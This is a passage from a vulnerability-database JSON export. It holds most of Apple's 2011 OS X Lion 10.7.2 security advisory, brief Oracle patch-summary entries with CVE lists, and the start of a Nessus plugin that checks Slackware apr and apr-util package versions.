requests.\r\nCVE-ID\r\nCVE-2011-1755\r\n\r\nKernel\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A person with physical access may be able to access the\r\nuser's password\r\nDescription: A logic error in the kernel's DMA protection permitted\r\nfirewire DMA at loginwindow, boot, and shutdown, although not at\r\nscreen lock. This update addresses the issue by preventing firewire\r\nDMA at all states where the user is not logged in.\r\nCVE-ID\r\nCVE-2011-3215 : Passware, Inc.\r\n\r\nKernel\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: An unprivileged user may be able to delete another user's\r\nfiles in a shared directory\r\nDescription: A logic error existed in the kernel's handling of file\r\ndeletions in directories with the sticky bit.\r\nCVE-ID\r\nCVE-2011-3216 : Gordon Davisson of Crywolf, Linc Davis, R. Dormer,\r\nand Allan Schmid and Oliver Jeckel of brainworks Training\r\n\r\nlibsecurity\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted website or e-mail message may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An error handling issue existed when parsing a\r\nnonstandard certificate revocation list extension.\r\nCVE-ID\r\nCVE-2011-3227 : Richard Godbee of Virginia Tech\r\n\r\nMailman\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in Mailman 2.1.14\r\nDescription: Multiple cross-site scripting issues existed in Mailman\r\n2.1.14. These issues are addressed by improved encoding of characters\r\nin HTML output. Further information is available via the Mailman site\r\nat http://mail.python.org/pipermail/mailman-\r\nannounce/2011-February/000158.html This issue does not affect OS X\r\nLion systems.\r\nCVE-ID\r\nCVE-2011-0707\r\n\r\nMediaKit\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Opening a maliciously crafted disk image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of disk images. These issues do not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-3217 : Apple\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Any user may read another local user's password data\r\nDescription: An access control issue existed in Open Directory. This\r\nissue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3435 : Arek Dreyer of Dreyer Network Consultants, Inc, and\r\nPatrick Dunstan at defenseindepth.net\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: An authenticated user may change that account's password\r\nwithout providing the current password\r\nDescription: An access control issue existed in Open Directory. This\r\nissue does not affect systems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3436 : Patrick Dunstan at defenceindepth.net\r\n\r\nOpen Directory\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A user may be able to log in without a password\r\nDescription: When Open Directory is bound to an LDAPv3 server using\r\nRFC2307 or custom mappings, such that there is no\r\nAuthenticationAuthority attribute for a user, an LDAP user may be\r\nallowed to log in without a password. This issue does not affect\r\nsystems prior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3226 : Jeffry Strunk of The University of Texas at Austin,\r\nSteven Eppler of Colorado Mesa University, Hugh Cole-Baker, and\r\nFrederic Metoz of Institut de Biologie Structurale\r\n\r\nPHP\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted PDF file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A signedness issue existed in FreeType's handling of\r\nType 1 fonts. This issue is addressed by updating FreeType to version\r\n2.4.6. This issue does not affect systems prior to OS X Lion. Further\r\ninformation is available via the FreeType site at\r\nhttp://www.freetype.org/\r\nCVE-ID\r\nCVE-2011-0226\r\n\r\nPHP\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in libpng 1.4.3\r\nDescription: libpng is updated to version 1.5.4 to address multiple\r\nvulnerabilities, the most serious of which may lead to arbitrary code\r\nexecution. Further information is available via the libpng website at\r\nhttp://www.libpng.org/pub/png/libpng.html\r\nCVE-ID\r\nCVE-2011-2690\r\nCVE-2011-2691\r\nCVE-2011-2692\r\n\r\nPHP\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in PHP 5.3.4\r\nDescription: PHP is updated to version 5.3.6 to address multiple\r\nvulnerabilities, the most serious of which may lead to arbitrary code\r\nexecution. This issues do not affect OS X Lion systems. Further\r\ninformation is available via the PHP website at http://www.php.net/\r\nCVE-ID\r\nCVE-2010-3436\r\nCVE-2010-4645\r\nCVE-2011-0420\r\nCVE-2011-0421\r\nCVE-2011-0708\r\nCVE-2011-1092\r\nCVE-2011-1153\r\nCVE-2011-1466\r\nCVE-2011-1467\r\nCVE-2011-1468\r\nCVE-2011-1469\r\nCVE-2011-1470\r\nCVE-2011-1471\r\n\r\npostfix\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may manipulate\r\nmail sessions, resulting in the disclosure of sensitive information\r\nDescription: A logic issue existed in Postfix in the handling of the\r\nSTARTTLS command. After receiving a STARTTLS command, Postfix may\r\nprocess other plain-text commands. An attacker in a privileged\r\nnetwork position may manipulate the mail session to obtain sensitive\r\ninformation from the encrypted traffic. This update addresses the\r\nissue by clearing the command queue after processing a STARTTLS\r\ncommand. This issue does not affect OS X Lion systems. Further\r\ninformation is available via the Postfix site at\r\nhttp://www.postfix.org/announcements/postfix-2.7.3.html\r\nCVE-ID\r\nCVE-2011-0411\r\n\r\npython\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in python\r\nDescription: Multiple vulnerabilities existed in python, the most\r\nserious of which may lead to arbitrary code execution. This update\r\naddresses the issues by applying patches from the python project.\r\nFurther information is available via the python site at\r\nhttp://www.python.org/download/releases/\r\nCVE-ID\r\nCVE-2010-1634\r\nCVE-2010-2089\r\nCVE-2011-1521\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in\r\nQuickTime's handling of movie files.\r\nCVE-ID\r\nCVE-2011-3228 : Apple\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSC\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSS\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0250 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STSZ\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0251 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in the handling of STTS\r\natoms in QuickTime movie files. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0252 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may inject\r\nscript in the local domain when viewing template HTML\r\nDescription: A cross-site scripting issue existed in QuickTime\r\nPlayer's "Save for Web" export. The template HTML files generated by\r\nthis feature referenced a script file from a non-encrypted origin. An\r\nattacker in a privileged network position may be able to inject\r\nmalicious scripts in the local domain if the user views a template\r\nfile locally. This issue is resolved by removing the reference to an\r\nonline script. This issue does not affect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3218 : Aaron Sigel of vtty.com\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nH.264 encoded movie files.\r\nCVE-ID\r\nCVE-2011-3219 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to the\r\ndisclosure of memory contents\r\nDescription: An uninitialized memory access issue existed in\r\nQuickTime's handling of URL data handlers within movie files.\r\nCVE-ID\r\nCVE-2011-3220 : Luigi Auriemma working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: An implementation issue existed in QuickTime's handling\r\nof the atom hierarchy within a movie file.\r\nCVE-ID\r\nCVE-2011-3221 : an anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted FlashPix file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nFlashPix files.\r\nCVE-ID\r\nCVE-2011-3222 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nQuickTime\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in QuickTime's handling of\r\nFLIC files.\r\nCVE-ID\r\nCVE-2011-3223 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero\r\nDay Initiative\r\n\r\nSMB File Server\r\nAvailable for: OS X Lion v10.7 and v10.7.1,\r\nOS X Lion Server v10.7 and v10.7.1\r\nImpact: A guest user may browse shared folders\r\nDescription: An access control issue existed in the SMB File Server.\r\nDisallowing guest access to the share point record for a folder\r\nprevented the '_unknown' user from browsing the share point but not\r\nguests (user 'nobody'). This issue is addressed by applying the\r\naccess control to the guest user. This issue does not affect systems\r\nprior to OS X Lion.\r\nCVE-ID\r\nCVE-2011-3225\r\n\r\nTomcat\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: Multiple vulnerabilities in Tomcat 6.0.24\r\nDescription: Tomcat is updated to version 6.0.32 to address multiple\r\nvulnerabilities, the most serious of which may lead to a cross site\r\nscripting attack. Tomcat is only provided on Mac OS X Server systems.\r\nThis issue does not affect OS X Lion systems. Further information is\r\navailable via the Tomcat site at http://tomcat.apache.org/\r\nCVE-ID\r\nCVE-2010-1157\r\nCVE-2010-2227\r\nCVE-2010-3718\r\nCVE-2010-4172\r\nCVE-2011-0013\r\nCVE-2011-0534\r\n\r\nUser Documentation\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8\r\nImpact: An attacker in a privileged network position may manipulate\r\nApp Store help content, leading to arbitrary code execution\r\nDescription: App Store help content was updated over HTTP. This\r\nupdate addresses the issue by updating App Store help content over\r\nHTTPS. This issue does not affect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3224 : Aaron Sigel of vtty.com\r\n\r\nWeb Server\r\nAvailable for: Mac OS X Server v10.6.8\r\nImpact: Clients may be unable to access web services that require\r\ndigest authentication\r\nDescription: An issue in the handling of HTTP Digest authentication\r\nwas addressed. Users may be denied access to the server's resources,\r\nwhen the server configuration should have allowed the access. This\r\nissue does not represent a security risk, and was addressed to\r\nfacilitate the use of stronger authentication mechanisms. Systems\r\nrunning OS X Lion Server are not affected by this issue.\r\n\r\nX11\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nOS X Lion v10.7 and v10.7.1, OS X Lion Server v10.7 and v10.7.1\r\nImpact: Multiple vulnerabilities in libpng\r\nDescription: Multiple vulnerabilities existed in libpng, the most\r\nserious of which may lead to arbitrary code execution. These issues\r\nare addressed by updating libpng to version 1.5.4 on OS Lion systems,\r\nand to 1.2.46 on Mac OS X v10.6 systems. Further information is\r\navailable via the libpng website at\r\nhttp://www.libpng.org/pub/png/libpng.html\r\nCVE-ID\r\nCVE-2011-2690\r\nCVE-2011-2691\r\nCVE-2011-2692\r\n\r\nOS X Lion v10.7.2 also includes Safari 5.1.1. For information on\r\nthe security content of Safari 5.1.1, please visit:\r\nhttp://support.apple.com/kb/HT5000\r\n\r\nOS X Lion v10.7.2 and Security Update 2011-006 may be obtained from\r\nthe Software Update pane in System Preferences, or Apple's Software\r\nDownloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nThe Software Update utility will present the update that applies\r\nto your system configuration. Only one is needed, either\r\nSecurity Update 2011-006 or OS X v10.7.2.\r\n\r\nFor OS X Lion v10.7.1\r\nThe download file is named: MacOSXUpd10.7.2.dmg\r\nIts SHA-1 digest is: 37f784e08d4461e83a891a7f8b8af24c2ceb8229\r\n\r\nFor OS X Lion v10.7\r\nThe download file is named: MacOSXUpdCombo10.7.2.dmg\r\nIts SHA-1 digest is: accd06d610af57df24f62ce7af261395944620eb\r\n\r\nFor OS X Lion Server v10.7.1\r\nThe download file is named: MacOSXServerUpd10.7.2.dmg\r\nIts SHA-1 digest is: e4084bf1dfa295a42f619224d149e515317955da\r\n\r\nFor OS X Lion Server v10.7\r\nThe download file is named: MacOSXServerUpdCombo10.7.2.dmg\r\nIts SHA-1 digest is: 25e86f5cf97b6644c7a025230431b1992962ec4a\r\n\r\nFor Mac OS X v10.6.8\r\nThe download file is named: SecUpd2011-006Snow.dmg\r\nIts SHA-1 digest is: 0f9c29610a06370d0c85a4c92dc278a48ba17a84\r\n\r\nFor Mac OS X Server v10.6.8\r\nThe download file is named: SecUpdSrvr2011-006.dmg\r\nIts SHA-1 digest is: 12de3732710bb03059f93527189d221c97ef8a06\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOlc/zAAoJEGnF2JsdZQeeWFcH/RDHS+dCP8T4a92uYRIbs9T3\r\nTFbT7hnOoTB0H+2eN3oziLNime2N4mO921heHobiAKSXv/luU41ZPHxVd6rE77Md\r\n/BHDqLv65RA0XFTIPmrTcfpLhI5UgXDLfOLrsmdwTm52l5zQZkoxufYFf3mB3h7U\r\nZJUD1s081Pjy45/Cbao097+JrDwS7ahhgkvTmpmSvJK/wWRz4JtZkvIYcQ2uQFR4\r\nsTg4l6pmi3d8sJJ4wzrEaxDpclRjvjURI4DiBMYwGAXeCMRgYi0y03tYtkjXoaSG\r\n69h2yD8EXQBuJkDyouak7/M/eMwUfb2S6o1HyXTldjdvFBFvvwvl+Y3xp8YmDzU=\r\n=gsvn\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-10-16T00:00:00", "type": "securityvulns", "title": "APPLE-SA-2011-10-12-3 OS X Lion v10.7.2 and Security Update 2011-006", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0187", "CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-3221", "CVE-2011-3227", "CVE-2011-0259", "CVE-2011-3216", "CVE-2011-3246", "CVE-2011-1466", "CVE-2011-3435", "CVE-2011-3222", "CVE-2011-0229", "CVE-2011-1521", "CVE-2010-4172", "CVE-2011-0419", "CVE-2011-1092", "CVE-2011-0252", "CVE-2011-3223", "CVE-2011-0185", "CVE-2011-1755", "CVE-2011-3220", "CVE-2011-0224", "CVE-2011-2464", "CVE-2010-4645", "CVE-2011-3214", "CVE-2010-3436", "CVE-2010-1157", "CVE-2011-0013", "CVE-2011-0708", "CVE-2011-3228", "CVE-2011-0249", "CVE-2011-0231", "CVE-2011-0534", "CVE-2011-3437", "CVE-2011-2691", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-2089", "CVE-2011-3224", "CVE-2011-0226", "CVE-2011-1470", "CVE-2011-3192", "CVE-2011-3219", "CVE-2011-3436", "CVE-2011-3225", "CVE-2011-3215", "CVE-2011-0260", "CVE-2011-2692", "CVE-2010-2227", "CVE-2011-1469", "CVE-2011-3218", "CVE-2010-3614", "CVE-2011-3213", "CVE-2010-3718", "CVE-2011-0250", "CVE-2011-3217", "CVE-2010-3613", "CVE-2010-1634", "CVE-2010-0097", "CVE-2011-0251", "CVE-2011-0707", "CVE-2011-0230", "CVE-2011-3226", "CVE-2011-2690", "CVE-2011-0411", "CVE-2011-3212", "CVE-2009-4022", "CVE-2011-1910"], "modified": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27155", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:13", "description": "Quarterly CPU fixes 89 dufferent vulnerabilities.", "cvss3": {}, "published": "2013-08-12T00:00:00", "type": "securityvulns", "title": "Oracle / Sun / MySQL / PeopleSoft applications multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-3769", "CVE-2013-3824", "CVE-2013-3774", "CVE-2013-3749", "CVE-2013-3819", "CVE-2013-3778", "CVE-2013-3788", "CVE-2013-3809", "CVE-2013-3818", "CVE-2013-3799", "CVE-2010-0434", "CVE-2010-0425", "CVE-2013-3783", "CVE-2013-3791", "CVE-2013-3768", "CVE-2013-3807", "CVE-2013-3823", "CVE-2013-3755", "CVE-2013-3753", "CVE-2011-0419", "CVE-2013-3786", "CVE-2008-2364", "CVE-2013-3771", "CVE-2013-3782", "CVE-2013-3760", "CVE-2012-2687", "CVE-2013-3756", "CVE-2013-3789", "CVE-2013-3767", "CVE-2013-3811", "CVE-2013-3776", "CVE-2013-3746", "CVE-2013-3777", "CVE-2013-3750", "CVE-2013-3770", "CVE-2013-3772", "CVE-2013-3757", "CVE-2013-3787", "CVE-2013-3808", "CVE-2013-1861", "CVE-2013-3813", "CVE-2013-3775", "CVE-2013-3800", "CVE-2013-3765", "CVE-2013-3784", "CVE-2013-3759", "CVE-2013-3803", "CVE-2013-2461", "CVE-2013-3806", "CVE-2013-3745", "CVE-2013-3780", "CVE-2006-5752", "CVE-2013-3794", "CVE-2013-3758", "CVE-2010-2068", "CVE-2013-3816", "CVE-2013-3763", "CVE-2013-3810", "CVE-2013-3754", "CVE-2007-3847", "CVE-2013-3748", "CVE-2013-0398", "CVE-2013-3751", "CVE-2007-6388", "CVE-2013-3752", "CVE-2013-3764", "CVE-2013-3773", "CVE-2013-3812", "CVE-2007-5000", "CVE-2013-3781", "CVE-2013-3805", "CVE-2005-3352", "CVE-2013-3795", "CVE-2013-3820", "CVE-2013-3821", "CVE-2013-3822", "CVE-2013-3761", "CVE-2013-3804", "CVE-2011-3348", "CVE-2013-3779", "CVE-2013-3825", "CVE-2013-3797", "CVE-2013-3802", "CVE-2013-3790", "CVE-2013-3796", "CVE-2013-3793", "CVE-2013-3747", "CVE-2013-3798", "CVE-2013-3801"], "modified": "2013-08-12T00:00:00", "id": "SECURITYVULNS:VULN:13214", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13214", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:47:38", "description": "Approx. 90 of diffent vulnerabilities in different applications.", "cvss3": {}, "published": "2012-10-28T00:00:00", "type": "securityvulns", "title": "Oracle / Sun / People Soft / MySQL applications multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2012-1773", "CVE-2012-1767", "CVE-2012-3120", "CVE-2012-1738", "CVE-2011-4317", "CVE-2012-1747", "CVE-2012-1741", "CVE-2012-1766", "CVE-2012-1761", "CVE-2012-1744", "CVE-2012-1740", "CVE-2012-3117", "CVE-2001-0323", "CVE-2012-1742", "CVE-2011-4358", "CVE-2012-3135", "CVE-2012-3123", "CVE-2012-3126", "CVE-2012-3129", "CVE-2012-1731", "CVE-2012-3110", "CVE-2011-0419", "CVE-2012-1732", "CVE-2012-1729", "CVE-2012-0563", "CVE-2012-3186", "CVE-2012-1771", "CVE-2011-4885", "CVE-2012-3124", "CVE-2012-3118", "CVE-2012-3134", "CVE-2012-1730", "CVE-2012-3131", "CVE-2012-1745", "CVE-2012-1746", "CVE-2012-1689", "CVE-2012-1743", "CVE-2012-1687", "CVE-2011-2699", "CVE-2012-1733", "CVE-2012-3130", "CVE-2012-1770", "CVE-2012-3127", "CVE-2012-1737", "CVE-2012-1752", "CVE-2012-1757", "CVE-2012-1734", "CVE-2012-3111", "CVE-2012-3107", "CVE-2012-1769", "CVE-2012-1765", "CVE-2012-3119", "CVE-2012-1749", "CVE-2012-3121", "CVE-2012-1748", "CVE-2011-3368", "CVE-2012-3185", "CVE-2012-3128", "CVE-2012-1756", "CVE-2012-3106", "CVE-2012-1736", "CVE-2012-1758", "CVE-2011-3192", "CVE-2012-1727", "CVE-2012-3122", "CVE-2012-1760", "CVE-2012-1759", "CVE-2012-3108", "CVE-2012-3112", "CVE-2012-3115", "CVE-2012-0540", "CVE-2012-1764", "CVE-2012-3183", "CVE-2012-3114", "CVE-2012-1768", "CVE-2012-1739", "CVE-2012-3109", "CVE-2012-1772", "CVE-2012-3184", "CVE-2012-3113", "CVE-2012-1728", "CVE-2012-1753", "CVE-2012-1735", "CVE-2012-3125", "CVE-2012-1762", "CVE-2012-1715", "CVE-2012-1754", "CVE-2012-3116", "CVE-2011-3562", "CVE-2012-1750", "CVE-2008-4609"], "modified": "2012-10-28T00:00:00", "id": "SECURITYVULNS:VULN:12672", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12672", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-18T14:21:07", "description": "New apr and apr-util packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix a security issue.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "nessus", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : apr/apr-util (SSA:2011-133-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:apr", "p-cpe:/a:slackware:slackware_linux:apr-util", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37"], "id": "SLACKWARE_SSA_2011-133-01.NASL", "href": "https://www.tenable.com/plugins/nessus/53898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2011-133-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53898);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\");\n script_xref(name:\"SSA\", value:\"2011-133-01\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : apr/apr-util (SSA:2011-133-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New apr and apr-util packages are available for Slackware 11.0, 12.0,\n12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.705697\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ca934cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apr and / or apr-util packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apr-util\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"apr\", pkgver:\"1.4.4\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\nif (slackware_check(osver:\"11.0\", pkgname:\"apr-util\", pkgver:\"1.3.11\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"apr\", pkgver:\"1.4.4\", 